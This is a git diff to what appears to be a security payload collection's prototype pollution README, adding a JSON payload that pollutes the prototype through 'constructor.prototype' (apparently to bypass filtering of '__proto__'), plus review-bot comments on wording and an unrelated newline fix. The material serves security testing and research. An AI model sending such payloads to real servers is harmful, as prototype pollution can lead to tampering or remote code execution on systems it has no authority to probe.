diff --git a/Prototype Pollution/README.md b/Prototype Pollution/README.md index 5770e1b806..4431bce5a1 100644 --- a/Prototype Pollution/README.md +++ b/Prototype Pollution/README.md @@ -99,6 +99,19 @@ Asynchronous payload for NodeJS. } ``` +Polluting the prototype via the `constructor` property instead. + +```js +{ + "constructor": { + "prototype": { + "foo": "bar", + "json spaces": 10 + } + } +} +``` + ### Prototype Pollution in URL @@ -176,4 +189,4 @@ Either create your own gadget using part of the source with [yeswehack/pp-finder * [Prototype Pollution Leads to RCE: Gadgets Everywhere - Mikhail Shcherbakov](https://youtu.be/v5dq80S1WF4) * [Server side prototype pollution, how to detect and exploit - YesWeHack](https://blog.yeswehack.com/talent-development/server-side-prototype-pollution-how-to-detect-and-exploit/) * [Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes - 15 February 2023](https://portswigger.net/research/server-side-prototype-pollution) -* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M) \ No newline at end of file +* [Keynote | Server Side Prototype Pollution: Blackbox Detection Without The DoS - Gareth Heyes](https://youtu.be/LD-KcuKM_0M)
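Review bot: the sentence introducing the new block in the first hunk ("Polluting the prototype via the `constructor` property instead.") is a fragment and does not say what this variant is an alternative to or when a reader would need it; suggest completing it, e.g. "The same pollution can be reached through `constructor.prototype`, which matters when the key normally used (presumably `__proto__`) is filtered or stripped by the target." It would also help to note that `"json spaces": 10` is carried over from the preceding NodeJS payload as the detection indicator, so readers do not take it for a required part of the `constructor` path.

Review bot: the second hunk changes nothing but the missing newline at end of file on the last reference entry (the `\ No newline at end of file` marker disappears); that is fine to keep, but since it is unrelated to the `constructor` addition it deserves a mention in the commit message or a separate commit.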